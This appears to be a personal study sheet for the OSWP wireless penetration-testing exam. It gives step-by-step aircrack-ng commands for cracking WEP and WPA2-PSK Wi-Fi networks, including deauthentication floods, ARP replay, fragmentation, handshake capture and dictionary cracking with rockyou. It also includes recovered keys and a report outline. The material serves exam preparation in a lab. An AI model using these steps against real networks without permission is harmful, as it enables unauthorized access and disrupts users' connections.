Prepared OSWP offsec

--- title: Prepared OSWP offsec tags: CTF --- ### wep sudo airmon-ng start wlan0mon sudo airodump-ng -c 3 --bssid F0:9F:C2:71:22:11 -w wep.cap wlan0mon sudo aireplay-ng -1 3600 -q 10 -a F0:9F:C2:71:22:11 wlan0mon sudo aireplay-ng --arpreplay -b F0:9F:C2:71:22:11 -h 02:00:00:00:00:00 wlan0mon nano wep.conf network={ ssid="wifi-old" key_mgmt=NONE wep_key0=11BB33CD55 wep_tx_keyidx=0 } sudo wpa_supplicant -i wlan2 -c wep.conf dhclient wlan2 -v curl http://192.168.1.1/proof.txt ### WPA2/PSK sudo airmon-ng check kill sudo airmon-ng start wlan0 sudo airodump-ng wlan0mon sudo airodump-ng --bssid F0:9F:C2:71:22:12 -c 6 -w wpa wlan0mon sudo aireplay-ng --deauth 0 -a F0:9F:C2:71:22:12 wlan0mon sudo aircrack-ng wpa.pcap -w rockyou.txt nano psk.conf network={ ssid="wifi-mobile" psk="starwars1" scan_ssid=1 key_mgmt=WPA-PSK proto=WPA2 } wpa_supplicant -i wlan3 -c psk.conf dhclient wlan3 -v curl http://192.168.1.1/proof.txt ### WPA2/MGT Reference: https://r4ulcl.com/posts/walkthrough-wifichallenge-lab-2.0/#07-get-wifi-old-password sudo ip link set wlan0 down sudo iw dev wlan0 set type monitor sudo ip link set wlan0 up ifconfig ip link show 3: mon0: <BROADCAST,MULTICAST> mtu 1500 qdisc noop state DOWN mode DEFAULT group default qlen 1000 link/ether 12:34:56:78:9a:bc brd ff:ff:ff:ff:ff:ff ![image](https://hackmd.io/_uploads/S1efvALclg.png) mac = 00:15:5d:9c:e4:ed ### WEP / Clientless / Fragmentation Attack ACCESS POINT MAC: 1C:7E:E5:41:E5:CB Controls & Pre-Attack Steps : root@bt ifconfig root@bt iwconfig root@bt airmon-ng check kill root@bt airmon-ng start wlan0 root@bt airodump-ng mon0 Attack Steps : root@bt airodump-ng --channel 3 --bssid 1C:7E:E5:41:E5:CB --write stage-1 mon0 (sudo airodump-ng -c 3 --bssid F0:9F:C2:71:22:11 -w stage1 wlan0mon) sudo aireplay-ng -1 0 -e ‘stage1’ -a F0:9F:C2:71:22:11 -h 08:00:27:2c:26:22 wlan0mon root@bt aireplay-ng -5 -b 1C:7E:E5:41:E5:CB -h Your_MAC mon0 ![image](https://hackmd.io/_uploads/S1EZ_i5hxl.png) no client root@bt packetforge-ng -0 -a 1C:7E:E5:41:E5:CB -h Your_MAC -l Your_IP -k 192.168.x.255 -y ### example : packetforge-ng -0 -a 1C:7E:E5:41:E5:CB -h 00:c0:ca:36:22:9e -l 192.168.1.101 -k 192.168.1.255 -y fragment-0209-121548.xor –w Stage1 file_name.xor -w New_File_Name root@bt aireplay-ng -2 -r New_File_Name mon0 example sudo aireplay-ng -2 -r stage1 wlan0mon wait until ![image](https://hackmd.io/_uploads/r15gN2O2gl.png) and see frames root@bt aircrack-ng stage-1-01.cap (aircrack-ng -0 Stage1-01.cap) ### WEP / Connected Client / Bypassing WEP Shared Key ACCESS POINT MAC: 00:14:D1:E1:C7:62 CLIENT MAC: 00:02:72:8E:19:5E Controls & Pre-Attack Steps : root@bt ifconfig root@bt iwconfig root@bt airmon-ng check kill root@bt airmon-ng start wlan0 root@bt airodump-ng mon0 Attack Steps : root@bt airodump-ng -C 11 --bssid 00:14:D1:E1:C7:62 mon0 -w Stage2 root@bt aireplay-ng -1 0 -e “STAGE 2” -a 00:14:D1:E1:C7:62 -h 00:c0:ca:36:22:9e mon0 ![image](https://hackmd.io/_uploads/Sk4Srh_3gg.png) it is require xor aireplay-ng -1 0 -e ‘STAGE 2’ -y Stage2-01-00-14-D1-E1-C7-62.xor -h 00:c0:ca:36:22:9e mon0 wait until success ![image](https://hackmd.io/_uploads/SkwII3_nxx.png) aireplay-ng --arpreplay -b 00:14:D1:E1:C7:62 -h 00:c0:ca:36:22:9e mon0 back to check airodump-ng ![image](https://hackmd.io/_uploads/BJyYI2unxg.png) root@bt aircrack-ng Stage-2-01.cap -0 ### WEP / Connected Client / Bypassing WEP Shared Key sudo aireplay-ng -1 0 -e “STAGE 2” -a 00:14:D1:E1:C7:62 -h 00:c0:ca:36:22:9e mon0 aireplay-ng -1 0 -e ‘STAGE 2’ -y Stage2-01-00-14-D1-E1-C7-62.xor -h 00:c0:ca:36:22:9e mon0 ( wait until show successfully) aireplay-ng --arpreplay -b 00:14:D1:E1:C7:62 -h 00:c0:ca:36:22:9e mon0 aircrack-ng -0 Stage2-01.cap ### WPA 2 / Connected Client / Pre-Shared Key Authentication ACCESS POINT MAC: 00:08:A1:CA:3E:CD CLIENT MAC: 00:C0:CA:30:F1:91 Controls & Pre-Attack Steps : root@bt ifconfig root@bt iwconfig root@bt airmon-ng check kill root@bt airmon-ng start wlan0 root@bt airodump-ng mon0 Attack Steps : root@bt airodump-ng --channel 6 --bssid 00:08:A1:CA:3E:CD --write stage-3 mon0 root@bt aireplay-ng —deauth 5 -a 00:08:A1:CA:3E:CD -c 00:C0:CA:30:F1:91 mon0 ( aireplay-ng -0 100 -a 00:08:A1:CA:3E:CD -c 00:c0:ca:30:f1:91 mon0 ) root@bt aircrack-ng -w psk-crack-dictionary stage-3-01.cap example( aircrack-ng -0 -w /root/psk-crack-dictionary stagex-01.cap ) -a is not mac ![image](https://hackmd.io/_uploads/HJUMns92ex.png) example sudo aireplay-ng -0 100 -a F0:9F:C2:71:22:12 -c 28:6C:07:6F:F9:43 wlan0mon wordlist: https://github.com/dw0rsec/rockyou.txt/blob/master/rockyou.txt.zip wget https://github.com/dw0rsec/rockyou.txt/raw/master/rockyou.txt.zip -O rockyou.txt.zip ### write report In the first we need to know our wireless card name so i used iwconfig command and I got my network card called wlan0 Then we need to start monitor mode using this command airmon-ng start wlan0 Then I started to discover all of the networks to get the first stage , channel and BSSID by using this command airodump-ng mon0 Now I got all I need so lets run listen on the network only by using this command or Then I started to discover all of the networks to get the first stage , channel and BSSID by using this command airodump-ng mon0 airodump-ng Then I tried to fake authentication with the targeted network using this command example aireplay-ng -1 0 -e ‘STAGE 1’ -a 1C:7E:E5:41:E5:CB -h 00:c0:ca:36:22:9e mon0 https://help.offsec.com/hc/en-us/articles/360046904731-OSWP-Exam-Guide